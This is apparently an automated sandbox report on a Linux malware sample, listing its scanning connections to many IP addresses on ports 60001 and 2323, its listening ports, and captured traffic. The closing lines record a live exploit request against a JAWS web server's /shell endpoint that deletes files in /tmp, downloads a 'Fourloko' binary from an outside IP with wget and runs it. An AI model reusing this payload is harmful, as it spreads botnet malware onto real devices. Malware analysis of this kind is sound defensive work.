Source: global traffic TCP traffic: 192.168.2.23:42028 -> 176.104.244.75:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 198.123.38.212:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 204.249.157.202:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 54.158.115.243:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 141.16.46.184:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 132.159.36.127:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 17.205.117.14:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 122.135.180.90:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 194.110.116.124:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 162.171.25.230:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 48.110.242.5:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 209.116.57.45:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 164.194.53.156:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 165.50.187.137:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 101.40.195.149:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 32.6.162.150:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 142.251.3.147:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 166.190.111.22:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 62.134.23.191:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 152.12.96.249:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 91.228.130.147:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 111.182.31.84:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 175.141.237.185:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 147.163.138.238:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 92.26.47.6:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 32.50.237.10:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 206.36.60.1:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 210.41.65.97:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 160.254.70.191:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 77.145.165.59:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 80.162.142.63:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 196.90.55.71:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 34.240.234.120:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 81.135.252.86:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 115.54.176.189:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 135.209.90.189:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 125.110.178.11:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 147.202.175.226:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 59.251.141.207:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 64.122.159.127:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 70.0.62.16:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 222.120.242.119:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 41.5.211.108:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 45.164.218.237:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 86.127.145.27:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 107.149.28.145:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 61.70.157.161:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 150.193.154.246:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 104.74.138.220:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 36.17.177.2:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 222.82.111.220:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 163.112.196.99:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 158.74.13.171:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 134.143.156.228:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 186.34.192.143:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 210.49.92.137:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 212.95.83.190:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 62.164.59.70:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 59.255.98.188:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 142.199.230.119:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 207.58.149.186:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 144.248.174.71:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 173.204.177.145:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 106.201.100.235:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 74.50.95.55:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 90.31.236.42:60001
Source: global traffic TCP traffic: 192.168.2.23:42284 -> 71.172.59.44:2323
Source: global traffic TCP traffic: 192.168.2.23:42284 -> 120.25.65.201:2323
Source: global traffic TCP traffic: 192.168.2.23:42284 -> 65.153.31.7:2323
Source: global traffic TCP traffic: 192.168.2.23:42284 -> 64.31.7.63:2323
Source: global traffic TCP traffic: 192.168.2.23:42284 -> 151.100.107.14:2323
Source: global traffic TCP traffic: 192.168.2.23:42284 -> 84.203.94.223:2323
Source: global traffic TCP traffic: 192.168.2.23:42284 -> 177.14.219.58:2323
Source: global traffic TCP traffic: 192.168.2.23:42284 -> 151.250.232.41:2323
Source: global traffic TCP traffic: 192.168.2.23:42284 -> 9.54.171.230:2323
Source: global traffic TCP traffic: 192.168.2.23:42284 -> 146.105.183.4:2323
Source: global traffic TCP traffic: 192.168.2.23:42284 -> 152.45.172.165:2323
Source: global traffic TCP traffic: 192.168.2.23:42284 -> 90.181.198.44:2323
Source: global traffic TCP traffic: 192.168.2.23:42284 -> 34.102.171.101:2323
Source: global traffic TCP traffic: 192.168.2.23:42284 -> 4.198.87.247:2323
Source: global traffic TCP traffic: 192.168.2.23:42284 -> 53.45.72.71:2323
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 160.52.234.72:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 81.225.86.245:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 203.233.73.95:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 76.62.1.217:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 157.173.223.116:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 149.231.145.199:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 206.187.76.8:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 74.155.147.251:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 222.232.111.17:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 174.207.32.38:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 131.60.77.186:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 48.133.5.124:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 12.71.158.249:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 219.150.249.221:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 138.77.187.249:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 209.142.176.24:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 76.241.222.169:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 141.233.235.246:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 42.141.159.188:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 151.86.54.221:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 64.230.96.254:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 147.139.27.42:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 42.196.74.43:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 32.103.235.0:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 166.115.162.4:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 31.145.196.90:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 145.152.32.158:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 37.9.181.237:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 141.109.67.70:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 182.234.179.0:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 130.64.134.73:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 118.160.50.194:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 185.211.243.133:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 149.146.85.161:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 204.70.68.220:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 175.226.98.113:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 103.172.112.202:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 76.212.147.190:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 78.5.2.128:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 5.91.15.147:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 72.77.199.171:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 20.130.34.193:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 205.244.180.7:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 175.94.247.27:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 132.9.174.246:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 101.246.110.130:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 187.98.204.182:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 77.111.208.14:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 191.144.2.27:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 4.242.176.29:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 8.69.43.202:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 183.214.135.130:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 174.179.3.247:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 12.119.3.142:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 210.111.87.178:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 78.166.140.198:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 91.12.107.40:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 152.138.41.199:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 45.40.139.188:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 148.31.32.49:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 161.187.67.134:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 119.144.161.109:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 123.228.155.233:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 136.50.36.101:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 112.37.143.83:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 25.143.207.83:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 167.159.30.247:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 114.145.182.193:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 101.114.24.199:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 84.148.105.160:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 37.82.119.95:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 189.106.135.217:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 8.142.95.118:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 207.240.47.4:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 113.138.6.36:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 222.236.134.169:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 27.96.35.155:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 206.92.43.151:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 146.160.111.161:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 138.162.227.226:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 75.250.137.163:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 137.1.230.71:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 46.209.109.111:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 76.101.121.174:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 185.241.219.173:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 98.94.54.211:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 62.163.229.190:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 102.186.96.37:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 5.72.58.39:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 191.216.188.143:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 196.50.200.118:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 160.205.150.207:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 39.103.223.163:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 23.93.242.117:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 134.198.217.196:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 84.19.131.22:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 191.3.22.199:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 57.130.245.37:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 81.165.131.236:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 123.193.94.149:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 147.174.189.3:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 143.202.63.126:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 179.89.124.54:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 171.224.44.120:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 216.219.151.168:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 190.174.207.126:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 66.246.204.206:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 41.87.47.240:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 74.0.249.243:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 156.143.210.28:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 179.128.115.208:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 171.154.193.197:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 193.203.160.171:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 120.13.77.138:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 42.213.180.123:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 222.17.122.21:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 63.19.75.189:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 42.243.221.244:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 109.7.213.45:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 89.5.210.58:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 108.2.232.38:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 114.40.253.31:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 185.35.104.253:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 61.218.29.127:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 91.183.174.158:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 45.37.128.201:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 133.240.139.98:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 90.164.249.204:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 181.216.12.212:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 108.54.18.127:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 136.65.0.90:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 60.223.100.61:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 182.194.102.166:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 82.177.26.8:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 223.246.88.40:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 114.79.13.9:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 104.2.194.163:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 129.61.6.241:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 13.89.106.71:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 14.73.203.214:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 102.153.202.206:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 179.13.20.46:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 200.7.27.150:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 157.67.216.33:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 19.92.118.103:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 150.162.112.199:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 117.211.168.174:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 51.160.232.169:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 164.73.195.173:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 167.242.44.86:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 152.132.83.177:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 18.146.56.66:60001
Source: global traffic TCP traffic: 192.168.2.23:42028 -> 18.184.200.126:60001
Sample listens on a socket
Source: /tmp/01oHMcUgUM (PID: 5263) Socket: 127.0.0.1::43829 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::23 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::0 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::80 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::60001 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::8000 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::9000 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::8080 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::8081 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::53413 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::52869 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::37215 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::81 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::8089 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::8088 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::8083 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::443 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::4444 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::8001 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::49152 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::40960 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::1024 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::1337 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) Socket: 0.0.0.0::420 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::0 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::80 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::60001 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::8000 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::9000 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::8080 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::8081 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::53413 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::52869 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::37215 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::81 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::8089 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::8088 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::8083 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::443 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::4444 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::8001 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::49152 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::40960 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::1024 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::1337 Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5271) Socket: 0.0.0.0::420 Jump to behavior
Source: /lib/systemd/systemd-journald (PID: 5305) Socket: <unknown socket type>:unknown Jump to behavior
Source: /usr/sbin/gdm3 (PID: 5500) Socket: <unknown socket type>:unknown Jump to behavior
Source: /usr/bin/dbus-daemon (PID: 5531) Socket: <unknown socket type>:unknown Jump to behavior
Source: /lib/systemd/systemd-journald (PID: 5568) Socket: <unknown socket type>:unknown Jump to behavior
Source: /lib/systemd/systemd-journald (PID: 5672) Socket: <unknown socket type>:unknown Jump to behavior
Source: /lib/systemd/systemd-journald (PID: 5768) Socket: <unknown socket type>:unknown
Source: /usr/sbin/gdm3 (PID: 5770) Socket: <unknown socket type>:unknown
Source: /lib/systemd/systemd-journald (PID: 5889) Socket: <unknown socket type>:unknown
Source: /lib/systemd/systemd-journald (PID: 5992) Socket: <unknown socket type>:unknown
Source: /usr/sbin/gdm3 (PID: 5993) Socket: <unknown socket type>:unknown
Source: unknown Network traffic detected: HTTP traffic on port 35426 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35426
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36630
Source: unknown Network traffic detected: HTTP traffic on port 36626 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36624
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36626
Source: unknown Network traffic detected: HTTP traffic on port 36630 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 36624 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 36628 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36628
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
Source: unknown TCP traffic detected without corresponding DNS query: 4.81.245.225
Source: unknown TCP traffic detected without corresponding DNS query: 82.36.132.225
Source: unknown TCP traffic detected without corresponding DNS query: 160.32.42.58
Source: unknown TCP traffic detected without corresponding DNS query: 200.170.27.226
Source: unknown TCP traffic detected without corresponding DNS query: 203.183.35.174
Source: unknown TCP traffic detected without corresponding DNS query: 34.186.231.233
Source: unknown TCP traffic detected without corresponding DNS query: 47.49.163.86
Source: unknown TCP traffic detected without corresponding DNS query: 2.127.230.162
Source: unknown TCP traffic detected without corresponding DNS query: 94.159.71.29
Source: unknown TCP traffic detected without corresponding DNS query: 200.165.134.110
Source: unknown TCP traffic detected without corresponding DNS query: 63.46.196.25
Source: unknown TCP traffic detected without corresponding DNS query: 117.105.22.91
Source: unknown TCP traffic detected without corresponding DNS query: 150.248.5.202
Source: unknown TCP traffic detected without corresponding DNS query: 98.238.3.115
Source: unknown TCP traffic detected without corresponding DNS query: 135.179.24.145
Source: unknown TCP traffic detected without corresponding DNS query: 219.143.235.62
Source: unknown TCP traffic detected without corresponding DNS query: 39.162.242.90
Source: unknown TCP traffic detected without corresponding DNS query: 18.103.180.113
Source: unknown TCP traffic detected without corresponding DNS query: 183.105.113.214
Source: unknown TCP traffic detected without corresponding DNS query: 1.192.146.209
Source: unknown TCP traffic detected without corresponding DNS query: 197.199.160.250
Source: unknown TCP traffic detected without corresponding DNS query: 201.38.104.82
Source: unknown TCP traffic detected without corresponding DNS query: 62.159.25.135
Source: unknown TCP traffic detected without corresponding DNS query: 106.130.225.37
Source: unknown TCP traffic detected without corresponding DNS query: 58.247.133.170
Source: unknown TCP traffic detected without corresponding DNS query: 122.27.140.123
Source: unknown TCP traffic detected without corresponding DNS query: 13.77.219.228
Source: unknown TCP traffic detected without corresponding DNS query: 222.37.249.9
Source: unknown TCP traffic detected without corresponding DNS query: 135.44.160.116
Source: unknown TCP traffic detected without corresponding DNS query: 61.213.96.210
Source: unknown TCP traffic detected without corresponding DNS query: 12.164.223.77
Source: unknown TCP traffic detected without corresponding DNS query: 175.97.216.210
Source: unknown TCP traffic detected without corresponding DNS query: 37.189.230.148
Source: unknown TCP traffic detected without corresponding DNS query: 118.2.232.218
Source: unknown TCP traffic detected without corresponding DNS query: 153.236.105.188
Source: unknown TCP traffic detected without corresponding DNS query: 186.59.14.222
Source: unknown TCP traffic detected without corresponding DNS query: 70.230.240.106
Source: unknown TCP traffic detected without corresponding DNS query: 130.58.76.84
Source: unknown TCP traffic detected without corresponding DNS query: 59.172.158.55
Source: unknown TCP traffic detected without corresponding DNS query: 149.85.150.54
Source: unknown TCP traffic detected without corresponding DNS query: 12.187.135.99
Source: unknown TCP traffic detected without corresponding DNS query: 78.107.7.30
Source: unknown TCP traffic detected without corresponding DNS query: 101.132.235.139
Source: unknown TCP traffic detected without corresponding DNS query: 135.92.140.170
Source: unknown TCP traffic detected without corresponding DNS query: 213.36.37.8
Source: unknown TCP traffic detected without corresponding DNS query: 72.124.43.19
Source: unknown TCP traffic detected without corresponding DNS query: 189.5.32.117
Source: unknown TCP traffic detected without corresponding DNS query: 97.121.36.249
Source: unknown TCP traffic detected without corresponding DNS query: 117.183.35.142
Source: unknown TCP traffic detected without corresponding DNS query: 86.29.182.227
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: JAWS/1.0 Aug 12 2019Content-Type: text/html; charset=UTF-8Content-length: 213
Source: syslog.286.dr, syslog.67.dr, syslog.190.dr, syslog.234.dr, syslog.344.dr String found in binary or memory: https://www.rsyslog.com
Source: unknown DNS traffic detected: queries for: daisy.ubuntu.com
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
